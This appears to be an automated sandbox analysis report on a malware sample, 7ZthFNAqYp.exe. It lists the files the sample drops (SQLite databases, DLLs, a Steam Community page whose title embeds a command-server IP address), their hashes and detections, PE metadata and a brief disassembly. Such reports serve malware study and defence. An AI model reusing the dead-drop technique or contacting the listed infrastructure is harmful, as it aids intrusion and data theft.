                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                        Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                        MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                        Entropy (8bit):0.0357803477377646
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                                        MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                                        SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                                        SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                                        SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                        MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                        SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                        SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                        SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                        Entropy (8bit):1.136471148832945
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: M8PoiLFYWM.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3035), with CRLF, LF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):34570
                                                                                                                                                                                                        Entropy (8bit):5.400682101941078
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:D5lpqEg8QE2fJoAa1+6u8vAAnTBv++nIjBtPF5zfhkPXo8A5LTBv++nIjBtPF5x+:Nl8Eg8QE2fJoAa1+6u2nTBv++nIjBtPT
                                                                                                                                                                                                        MD5:A005E9FFB7FA2D681B5D816F37C0BBD0
                                                                                                                                                                                                        SHA1:A2153E5EDE885CE50667328E0342D5853FCE4BCB
                                                                                                                                                                                                        SHA-256:93B002E291C4732BA5B57C44AE7B4552DB28744B9D873305D1A35900001C08B9
                                                                                                                                                                                                        SHA-512:88343A48A10C2A776F5E595A2B402F8B54E6E31202CDAF22D106EE9028B072EFB071E9E32B37955D54C7D4D4F7C10F94C7D3F63B9F7247EB7AD6C24A6F7457FA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: g0b4c https://95.217.220.103|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/shared/css/shared_global.css?v=_CwtgIbuqQ1L&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.steam
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:Non-ISO extended-ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1048575
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:RR0:L0
                                                                                                                                                                                                        MD5:F5D8DBBB5379A360AE6018BCBBD02561
                                                                                                                                                                                                        SHA1:0FDFAB151F769C2BA6E96E5D6C96EC92FE74EC49
                                                                                                                                                                                                        SHA-256:FE0B9992F19270E0BE4F71BF6F8C919D18942176003F626EA8CE32C46D433540
                                                                                                                                                                                                        SHA-512:9A2DCF48D36E3F66DAECC28E5EF95C974AF3B30EA46ADAA7F184FAA3FECE55698D3F19E49A73492C2260622871BA8A8039153C2C665068FC30424F7CB35FA604
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):979379375
                                                                                                                                                                                                        Entropy (8bit):0.0779250469830207
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                        MD5:5F3AA21F651A11DA515CF7CA559779DE
                                                                                                                                                                                                        SHA1:38C2F8ED6E9AEC63A3F8D1A46ED8880F40373ECD
                                                                                                                                                                                                        SHA-256:F4BAB09FD17EC12C54C539D992B2EAE31F3607046806E9891E3622B9844EFC1C
                                                                                                                                                                                                        SHA-512:7BB446D4C42A8F6B823655C0D554496BC7E3D9FC43D13774EF50019E0802983DC4E910F676EF4B5487C46E1A79C41AD797C7A3AE473CA32A23343FB0DD3AFFA3
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):6.926421213843795
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:7ZthFNAqYp.exe
                                                                                                                                                                                                        File size:5'233'152 bytes
                                                                                                                                                                                                        MD5:6733924c670207ed7755dc0fe2286c36
                                                                                                                                                                                                        SHA1:2fea9c1b0c3b0a923232dbcadcfc661bb08031d0
                                                                                                                                                                                                        SHA256:a555018ed03a0b191f64f625b75cebd9f62c194c7b1c1a66b91266f2f1c1b6c4
                                                                                                                                                                                                        SHA512:692d642223ddcff9e75e0d76437fbc760f9a356609fc4c3cccdddbdeb453f2bf04ce8438c3820b4445c320840a28f86215da880f1d8fe96dc9f65567e4505e67
                                                                                                                                                                                                        SSDEEP:98304:6o4H5BopFuyJBk7f2lMmojnMH1u/FRrxrjUJMJCG:6oQ5Ba3k7LMH1u/rrxrjUJ0
                                                                                                                                                                                                        TLSH:D2365C30B7D288ADC212A631167BAD208D5A5EF93F38E15F3B4FF6262EB1D475008D56
                                                                                                                                                                                                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........s.W...W...W...2...K...2...V...2.......2...t...2...p...W...B.......E.......M.......3.......R.......\.......V...W...V.......V..
                                                                                                                                                                                                        Icon Hash:70e0b0bc9ca8a0d0
                                                                                                                                                                                                        Entrypoint:0x5e3ba5
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x5D0CE2E6 [Fri Jun 21 14:00:06 2019 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:7fcbcb070324bd39594d1f1d97589c61
                                                                                                                                                                                                        Signature Valid:
                                                                                                                                                                                                        Signature Issuer:
                                                                                                                                                                                                        Signature Validation Error:
                                                                                                                                                                                                        Error Number:
                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                            Version:
                                                                                                                                                                                                            Thumbprint MD5:
                                                                                                                                                                                                            Thumbprint SHA-1:
                                                                                                                                                                                                            Thumbprint SHA-256:
                                                                                                                                                                                                            Serial:
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            call 00007FD7E15AC7ABh
                                                                                                                                                                                                            jmp 00007FD7E15ABD9Ch
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            mov ecx, dword ptr [0065ECA0h]
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            cmp ecx, 005E3BAFh
                                                                                                                                                                                                            setne al
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                            mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            pop edi
                                                                                                                                                                                                            pop edi
                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                            mov esp, ebp
                                                                                                                                                                                                            pop ebp
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            ret
                                                                                                                                                                                                            mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                                                            xor ecx, ebp
                                                                                                                                                                                                            call 00007FD7E15AACAAh
                                                                                                                                                                                                            jmp 00007FD7E15ABF40h
                                                                                                                                                                                                            mov ecx, dword ptr [ebp-14h]
